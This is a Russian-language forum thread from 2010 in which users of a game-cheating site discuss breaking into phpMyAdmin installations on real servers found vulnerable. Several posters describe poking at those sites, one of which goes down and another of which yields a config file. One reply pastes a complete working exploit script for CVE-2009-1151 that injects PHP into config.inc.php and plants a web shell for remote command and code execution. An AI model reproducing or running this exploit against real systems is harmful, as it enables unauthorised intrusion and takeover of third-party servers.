Регистрация Главная Сообщество
Сообщения за день Справка Регистрация

phpMyAdmin или возможности взлома ее.

-

Базы серверов и брут

- Все, что связано с брутом и работой с базами данных

Ответ
 
Опции темы
Старый 10.12.2010, 21:31   #1
Знатный Читер
 Капитан
Аватар для NeGGa
 
NeGGa знает себе ценуNeGGa знает себе ценуNeGGa знает себе ценуNeGGa знает себе ценуNeGGa знает себе ценуNeGGa знает себе ценуNeGGa знает себе ценуNeGGa знает себе ценуNeGGa знает себе ценуNeGGa знает себе ценуNeGGa знает себе цену
Регистрация: 08.04.2010
Сообщений: 273
Популярность: 4186
Сказал(а) спасибо: 231
Поблагодарили 1,093 раз(а) в 282 сообщениях
Отправить сообщение для NeGGa с помощью ICQ
 
Lightbulb phpMyAdmin или возможности взлома ее.

Решил взяться за данную уязвимость , пока глухо (поэтому создал тему с обсуждением данной уязвимости)
Так что может быть кто-то из вас сталкивался и работал с данной уязвимостью.

Нужно чутка всем вместе покопать и возможно , что-то найдем.
Могу сказать 1. Тут есть эксплоит - [Ссылки могут видеть только зарегистрированные пользователи. ]

Сейчас на многих серверах , есть данная дырка .

Пару уязвимостей для пробы , найденых мною. Среди них , есть довольно известные сервера.
  • [Ссылки могут видеть только зарегистрированные пользователи. ]
  • [Ссылки могут видеть только зарегистрированные пользователи. ]
  • [Ссылки могут видеть только зарегистрированные пользователи. ]
  • [Ссылки могут видеть только зарегистрированные пользователи. ]
  • [Ссылки могут видеть только зарегистрированные пользователи. ]
  • [Ссылки могут видеть только зарегистрированные пользователи. ]
  • [Ссылки могут видеть только зарегистрированные пользователи. ]
  • [Ссылки могут видеть только зарегистрированные пользователи. ]

___________
Любого рода флудо-посты будут удаляться.
Пишим только по теме . Обьясняем все точно , а не в 2-х словах.
________________
old user
  Ответить с цитированием
Старый 10.12.2010, 21:55   #2
Заблокирован
 Сержант
Аватар для Звезда в шоке
 
Звезда в шоке на правильном путиЗвезда в шоке на правильном пути
Регистрация: 13.08.2010
Сообщений: 120
Популярность: 104
Сказал(а) спасибо: 234
Поблагодарили 83 раз(а) в 53 сообщениях
 
По умолчанию Re: phpMyAdmin или возможности взлома ее.

После некий тупых клацаний в панеле что ты предоставил на сайте ready-2play.net он стал недоступен.Случайность?
  Ответить с цитированием
Старый 10.12.2010, 22:56   #3
Заблокирован
 Пехотинец
Аватар для pr0m0
 
pr0m0 неизвестен в этих краяхpr0m0 неизвестен в этих краяхpr0m0 неизвестен в этих краяхpr0m0 неизвестен в этих краях
Регистрация: 14.07.2009
Сообщений: 54
Популярность: -347
Сказал(а) спасибо: 232
Поблагодарили 67 раз(а) в 34 сообщениях
 
По умолчанию Re: phpMyAdmin или возможности взлома ее.

Насколько я понял, это обычный шаблон через который ничего не сделаешь. Там доступ к скрытым папкам нужен, тут его никак не нароешь
  Ответить с цитированием
Старый 11.12.2010, 00:16   #4
 Разведчик
Аватар для Phaere
 
Phaere никому не известный тип
Регистрация: 01.10.2010
Сообщений: 9
Популярность: 18
Сказал(а) спасибо: 0
Поблагодарили 4 раз(а) в 3 сообщениях
 
По умолчанию Re: phpMyAdmin или возможности взлома ее.

да, чето клацал, скачал config.inc.php
________________
  Ответить с цитированием
Старый 11.12.2010, 00:18   #5
 Сержант
Аватар для PornFlakex
 
PornFlakex душа компанииPornFlakex душа компанииPornFlakex душа компанииPornFlakex душа компанииPornFlakex душа компанииPornFlakex душа компанииPornFlakex душа компанииPornFlakex душа компании
Регистрация: 25.02.2009
Сообщений: 140
Популярность: 966
Сказал(а) спасибо: 214
Поблагодарили 263 раз(а) в 118 сообщениях
 
По умолчанию Re: phpMyAdmin или возможности взлома ее.

в том конфиге кроме создателя нечего неузнаеш
________________
Yeah Yeah Yeah
  Ответить с цитированием
Старый 11.12.2010, 23:08   #6
 Разведчик
Аватар для JIuHeuKa
 
JIuHeuKa никому не известный тип
Регистрация: 23.11.2010
Сообщений: 5
Популярность: 10
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
 
По умолчанию Re: phpMyAdmin или возможности взлома ее.

[Ссылки могут видеть только зарегистрированные пользователи. ]

что случилось с сайтом ?????**** я там случайно ввел коешто )))))

п.с. эт не флуд у мну место сайта хостинг какойто на аренду серверов .... у вас также ?**

Последний раз редактировалось JIuHeuKa; 11.12.2010 в 23:12. Причина: добавил
  Ответить с цитированием
Старый 12.12.2010, 01:11   #7
 Пехотинец
Аватар для alexskb
 
alexskb на правильном пути
Регистрация: 23.11.2009
Сообщений: 85
Популярность: 64
Сказал(а) спасибо: 17
Поблагодарили 57 раз(а) в 23 сообщениях
 
По умолчанию Re: phpMyAdmin или возможности взлома ее.

а что с помощью этой инъекции можно сделать?
________________
Приму в дар шмот/акки с Aserios.tm
Немцы сволочи
Skyp:alexskb1
  Ответить с цитированием
Старый 12.12.2010, 10:10   #8
 Разведчик
Аватар для ProDeD
 
ProDeD никому не известный тип
Регистрация: 05.12.2010
Сообщений: 1
Популярность: 10
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
 
По умолчанию Re: phpMyAdmin или возможности взлома ее.

[Ссылки могут видеть только зарегистрированные пользователи. ]
[Ссылки могут видеть только зарегистрированные пользователи. ] мб чем то поможет)
phpMyAdmin (/scripts/setup.php) PHP Code Injection Exploit
Код:
#!/bin/bash

# CVE-2009-1151: phpMyAdmin '/scripts/setup.php' PHP Code Injection RCE PoC v0.11
# by pagvac (gnucitizen.org), 4th June 2009.
# special thanks to Greg Ose (labs.neohapsis.com) for discovering such a cool vuln, 
# and to str0ke (milw0rm.com) for testing this PoC script and providing feedback!

# PoC script successfully tested on the following targets:
# phpMyAdmin 2.11.4, 2.11.9.3, 2.11.9.4, 3.0.0 and 3.0.1.1
# Linux 2.6.24-24-generic i686 GNU/Linux (Ubuntu 8.04.2)

# attack requirements:
# 1) vulnerable version (obviously!): 2.11.x before 2.11.9.5
# and 3.x before 3.1.3.1 according to PMASA-2009-3
# 2) it *seems* this vuln can only be exploited against environments
# where the administrator has chosen to install phpMyAdmin following
# the *wizard* method, rather than manual method: http://************/jhjxx
# 3) administrator must have NOT deleted the '/config/' directory
# within the '/phpMyAdmin/' directory. this is because this directory is
# where '/scripts/setup.php' tries to create 'config.inc.php' which is where
# our evil PHP code is injected 8)

# more info on:
# http://www.phpmyadmin.net/home_page/security/PMASA-2009-3.php
# http://labs.neohapsis.com/2009/04/06/about-cve-2009-1151/

if [[ $# -ne 1 ]]
then
	echo "usage: ./$(basename $0) <phpMyAdmin_base_URL>"
	echo "i.e.: ./$(basename $0) http://target.tld/phpMyAdmin/"
	exit
fi

if ! which curl >/dev/null
then
	echo "sorry but you need curl for this script to work!"
       	echo "on Debian/Ubuntu: sudo apt-get install curl"
       	exit
fi


function exploit {

postdata="token=$1&action=save&configuration="\
"a:1:{s:7:%22Servers%22%3ba:1:{i:0%3ba:6:{s:23:%22h  ost%27]="\
"%27%27%3b%20phpinfo%28%29%3b//%22%3bs:9:%22localhost%22%3bs:9:"\
"%22extension%22%3bs:6:%22mysqli%22%3bs:12:%22conne  ct_type%22%3bs:3:"\
"%22tcp%22%3bs:8:%22compress%22%3bb:0%3bs:9:%22auth  _type%22%3bs:6:"\
"%22config%22%3bs:4:%22user%22%3bs:4:%22root%22%3b}  }}&eoltype=unix"

postdata2="token=$1&action=save&configuration=a:1:"\
"{s:7:%22Servers%22%3ba:1:{i:0%3ba:6:{s:136:%22host  %27%5d="\
"%27%27%3b%20if(\$_GET%5b%27c%27%5d){echo%20%27%3cp  re%3e%27%3b"\
"system(\$_GET%5b%27c%27%5d)%3becho%20%27%3c/pre%3e%27%3b}"\
"if(\$_GET%5b%27p%27%5d){echo%20%27%3cpre%3e%27%3be  val"\
"(\$_GET%5b%27p%27%5d)%3becho%20%27%3c/pre%3e%27%3b}%3b//"\
"%22%3bs:9:%22localhost%22%3bs:9:%22extension%22%3b  s:6:%22"\
"mysqli%22%3bs:12:%22connect_type%22%3bs:3:%22tcp%2  2%3bs:8:"\
"%22compress%22%3bb:0%3bs:9:%22auth_type%22%3bs:6:%  22config"\
"%22%3bs:4:%22user%22%3bs:4:%22root%22%3b}}}&eoltype=unix"

	flag="/tmp/$(basename $0).$RANDOM.phpinfo.flag.html"
	
	echo "[+] attempting to inject phpinfo() ..."
	curl -ks -b $2 -d "$postdata" --url "$3/scripts/setup.php" >/dev/null

	if curl -ks --url "$3/config/config.inc.php" | grep "phpinfo()" >/dev/null
	then
		curl -ks --url "$3/config/config.inc.php" >$flag	
		echo "[+] success! phpinfo() injected successfully! output saved on $flag"
		curl -ks -b $2 -d $postdata2 --url "$3/scripts/setup.php" >/dev/null
		echo "[+] you *should* now be able to remotely run shell commands and PHP code using your browser. i.e.:"
		echo "    $3/config/config.inc.php?c=ls+-l+/"
		echo "    $3/config/config.inc.php?p=phpinfo();"
		echo "    please send any feedback/improvements for this script to"\
		"unknown.pentester<AT_sign__here>gmail.com"
	else
		echo "[+] no luck injecting to $3/config/config.inc.php :("
		exit
	fi
}
# end of exploit function

cookiejar="/tmp/$(basename $0).$RANDOM.txt"
token=`curl -ks -c $cookiejar --url "$1/scripts/setup.php" | grep \"token\" | head -n 1 | cut -d \" -f 12`
echo "[+] checking if phpMyAdmin exists on URL provided ..."

#if grep phpMyAdmin $cookiejar 2>/dev/null > /dev/null
if grep phpMyAdmin $cookiejar &>/dev/null
then
	length=`echo -n $token | wc -c`

	# valid form token obtained?
	if [[ $length -eq 32 ]]
	then
		echo "[+] phpMyAdmin cookie and form token received successfully. Good!"
		# attempt exploit!
		exploit $token $cookiejar $1
	else
		echo "[+] could not grab form token. you might want to try exploiting the vuln manually :("
		exit
	fi
else
	echo "[+] phpMyAdmin NOT found! phpMyAdmin base URL incorrectly typed? wrong case-sensitivity?"
	exit
fi

# milw0rm.com [2009-06-09]

Последний раз редактировалось ProDeD; 12.12.2010 в 10:17.
  Ответить с цитированием
Ответ


Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход

Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[Помогите!] Phpmyadmin Eminem-23 Общение и обсуждение, архив Lineage 2 0 15.07.2010 18:33

Заявление об ответственности / Список мошенников

Часовой пояс GMT +4, время: 22:12.

Пишите нам: [email protected]
Copyright © 2024 vBulletin Solutions, Inc.
Translate: zCarot. Webdesign by DevArt (Fox)
G-gaMe! Team production | Since 2008
Hosted by GShost.net